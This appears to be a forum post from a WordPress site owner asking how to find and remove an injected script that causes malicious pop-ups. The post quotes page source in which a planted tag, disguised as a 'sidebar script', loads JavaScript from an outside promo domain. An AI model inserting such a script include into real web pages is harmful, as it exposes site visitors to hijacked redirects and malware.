I have a malicious pop-op that appears on my site, and i've found the code when i view source. It's the reference to "top5result.com/promo..." that is messing things up!!!
<!-- Framework CSS -->
<link rel="stylesheet" href="http://pauljohnston.com/wp-content/themes/gridblog/blueprint/screen.css" type="text/css" media="screen, projection" />
<strong><!-- sidebar script --><head><script type="text/javascript" src="http://top5result.com/promo/bar.js"></script></head></strong>
<link rel="stylesheet" href="http://pauljohnston.com/wp-content/themes/gridblog/blueprint/print.css" type="text/css" media="print" />
<!--[if IE]><link rel="stylesheet" href="http://pauljohnston.com/wp-content/themes/gridblog/blueprint/ie.css" type="text/css" media="screen, projection" /><![endif]-->
My problem is that i can't figure out where this code exists to remove it. Can anyone suggest anything? Curiously, the link only seems to trigger upon redirect from another site - but regardless, I want to get rid of it!
Many thanks!!!!